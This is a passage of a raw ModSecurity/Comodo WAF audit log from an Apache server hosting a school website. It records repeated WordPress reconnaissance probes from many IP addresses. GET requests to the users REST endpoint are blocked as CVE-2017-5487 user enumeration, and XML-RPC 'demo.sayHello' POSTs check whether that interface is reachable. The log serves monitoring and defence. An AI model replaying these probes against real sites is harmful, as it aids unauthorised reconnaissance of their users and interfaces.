userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445951095073 5370 (- - -) Stopwatch2: 1747445951095073 5370; combined=4024, p1=525, p2=3283, p3=29, p4=31, p5=92, sr=74, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --17589e7c-Z-- --57c2c447-A-- [17/May/2025:08:43:22 +0700] aCfpunyxdQCiyU1ENFcnzwAAAAg 103.236.140.4 44346 103.236.140.4 8181 --57c2c447-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.35.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.35.196 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --57c2c447-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --57c2c447-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747446202154279 3227 (- - -) Stopwatch2: 1747446202154279 3227; combined=1413, p1=475, p2=897, p3=0, p4=0, p5=41, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --57c2c447-Z-- --7e9fb006-A-- [17/May/2025:08:43:29 +0700] aCfpwQTOsBn9MSWb6WJuyQAAAI0 103.236.140.4 44350 103.236.140.4 8181 --7e9fb006-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.35.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.35.196 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7e9fb006-C-- demo.sayHello --7e9fb006-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7e9fb006-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747446209794298 5577 (- - -) Stopwatch2: 1747446209794298 5577; combined=4119, p1=552, p2=3409, p3=23, p4=24, p5=65, sr=76, sw=46, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7e9fb006-Z-- --e6247f3e-A-- [17/May/2025:08:43:46 +0700] aCfp0um4kjNN-hEbWjJBRgAAAEc 103.236.140.4 44354 103.236.140.4 8181 --e6247f3e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.175.24 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.175.24 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e6247f3e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e6247f3e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747446226530222 2796 (- - -) Stopwatch2: 1747446226530222 2796; combined=1232, p1=424, p2=778, p3=0, p4=0, p5=30, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e6247f3e-Z-- --3c00bc1d-A-- [17/May/2025:08:43:52 +0700] aCfp2Om4kjNN-hEbWjJBRwAAAEY 103.236.140.4 44358 103.236.140.4 8181 --3c00bc1d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.175.24 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.175.24 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3c00bc1d-C-- demo.sayHello --3c00bc1d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3c00bc1d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747446232155377 6668 (- - -) Stopwatch2: 1747446232155377 6668; combined=4749, p1=585, p2=3942, p3=38, p4=39, p5=86, sr=76, sw=59, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3c00bc1d-Z-- --b944cf41-A-- [17/May/2025:08:44:37 +0700] aCfqBXyxdQCiyU1ENFcn0wAAABA 103.236.140.4 44368 103.236.140.4 8181 --b944cf41-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.42.116 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.42.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b944cf41-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b944cf41-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747446277627293 2867 (- - -) Stopwatch2: 1747446277627293 2867; combined=1289, p1=422, p2=835, p3=0, p4=0, p5=31, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b944cf41-Z-- --4a9f7b30-A-- [17/May/2025:08:44:46 +0700] aCfqDnyxdQCiyU1ENFcn1AAAABE 103.236.140.4 44378 103.236.140.4 8181 --4a9f7b30-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.42.116 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.42.116 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4a9f7b30-C-- demo.sayHello --4a9f7b30-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4a9f7b30-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747446286385928 6254 (- - -) Stopwatch2: 1747446286385928 6254; combined=4831, p1=614, p2=3970, p3=41, p4=43, p5=97, sr=103, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4a9f7b30-Z-- --1c8b0519-A-- [17/May/2025:08:44:49 +0700] aCfqEXyxdQCiyU1ENFcn1QAAAA4 103.236.140.4 44382 103.236.140.4 8181 --1c8b0519-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.181.78 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.181.78 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1c8b0519-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c8b0519-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747446289129600 1458 (- - -) Stopwatch2: 1747446289129600 1458; combined=686, p1=236, p2=430, p3=0, p4=0, p5=20, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c8b0519-Z-- --3957565d-A-- [17/May/2025:08:44:54 +0700] aCfqFnyxdQCiyU1ENFcn1gAAAA8 103.236.140.4 44386 103.236.140.4 8181 --3957565d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.181.78 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.181.78 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3957565d-C-- demo.sayHello --3957565d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3957565d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747446294740435 6667 (- - -) Stopwatch2: 1747446294740435 6667; combined=4840, p1=623, p2=3975, p3=40, p4=43, p5=96, sr=82, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3957565d-Z-- --e6247f3e-A-- [17/May/2025:08:45:31 +0700] aCfqOwTOsBn9MSWb6WJuywAAAIo 103.236.140.4 44394 103.236.140.4 8181 --e6247f3e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.175.125 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.175.125 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e6247f3e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e6247f3e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747446331129526 3255 (- - -) Stopwatch2: 1747446331129526 3255; combined=1408, p1=483, p2=894, p3=0, p4=0, p5=31, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e6247f3e-Z-- --b164b95a-A-- [17/May/2025:08:45:38 +0700] aCfqQnyxdQCiyU1ENFcn2AAAABM 103.236.140.4 44402 103.236.140.4 8181 --b164b95a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.175.125 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.175.125 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b164b95a-C-- demo.sayHello --b164b95a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b164b95a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747446338506789 5474 (- - -) Stopwatch2: 1747446338506789 5474; combined=3717, p1=486, p2=3041, p3=33, p4=35, p5=73, sr=56, sw=49, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b164b95a-Z-- --f67c802b-A-- [17/May/2025:08:45:41 +0700] aCfqRRKi5m5upc8uMd6iQwAAANE 103.236.140.4 44416 103.236.140.4 8181 --f67c802b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.60.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.60.153 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f67c802b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f67c802b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747446341201679 2941 (- - -) Stopwatch2: 1747446341201679 2941; combined=1261, p1=428, p2=805, p3=0, p4=0, p5=28, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f67c802b-Z-- --ac44e876-A-- [17/May/2025:08:45:46 +0700] aCfqSnyxdQCiyU1ENFcn3wAAAAY 103.236.140.4 44424 103.236.140.4 8181 --ac44e876-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.60.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.60.153 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ac44e876-C-- demo.sayHello --ac44e876-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ac44e876-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747446346346048 6222 (- - -) Stopwatch2: 1747446346346048 6222; combined=4520, p1=603, p2=3682, p3=36, p4=42, p5=94, sr=80, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ac44e876-Z-- --46b4336f-A-- [17/May/2025:08:46:25 +0700] aCfqcXyxdQCiyU1ENFcn4gAAAAs 103.236.140.4 44432 103.236.140.4 8181 --46b4336f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.87.28 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.87.28 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --46b4336f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --46b4336f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747446385934967 2650 (- - -) Stopwatch2: 1747446385934967 2650; combined=1497, p1=467, p2=994, p3=0, p4=0, p5=36, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --46b4336f-Z-- --e8038a7c-A-- [17/May/2025:08:46:29 +0700] aCfqdXyxdQCiyU1ENFcn5AAAABA 103.236.140.4 44436 103.236.140.4 8181 --e8038a7c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.87.28 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.87.28 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e8038a7c-C-- demo.sayHello --e8038a7c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e8038a7c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747446389823858 5646 (- - -) Stopwatch2: 1747446389823858 5646; combined=4120, p1=543, p2=3355, p3=31, p4=36, p5=92, sr=77, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e8038a7c-Z-- --c0b9b878-A-- [17/May/2025:08:46:42 +0700] aCfqgnyxdQCiyU1ENFcn5gAAABM 103.236.140.4 44440 103.236.140.4 8181 --c0b9b878-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.81.134 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.81.134 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c0b9b878-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c0b9b878-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747446402365856 2739 (- - -) Stopwatch2: 1747446402365856 2739; combined=1096, p1=376, p2=695, p3=0, p4=0, p5=25, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c0b9b878-Z-- --3c5f0076-A-- [17/May/2025:08:46:47 +0700] aCfqh3yxdQCiyU1ENFcn6AAAABY 103.236.140.4 44444 103.236.140.4 8181 --3c5f0076-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.81.134 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.81.134 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3c5f0076-C-- demo.sayHello --3c5f0076-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3c5f0076-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747446407525450 3419 (- - -) Stopwatch2: 1747446407525450 3419; combined=2613, p1=335, p2=2121, p3=18, p4=18, p5=70, sr=48, sw=51, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3c5f0076-Z-- --cf06c65b-A-- [17/May/2025:08:46:58 +0700] aCfqknyxdQCiyU1ENFcn7AAAAAM 103.236.140.4 44454 103.236.140.4 8181 --cf06c65b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.165.236 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.165.236 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 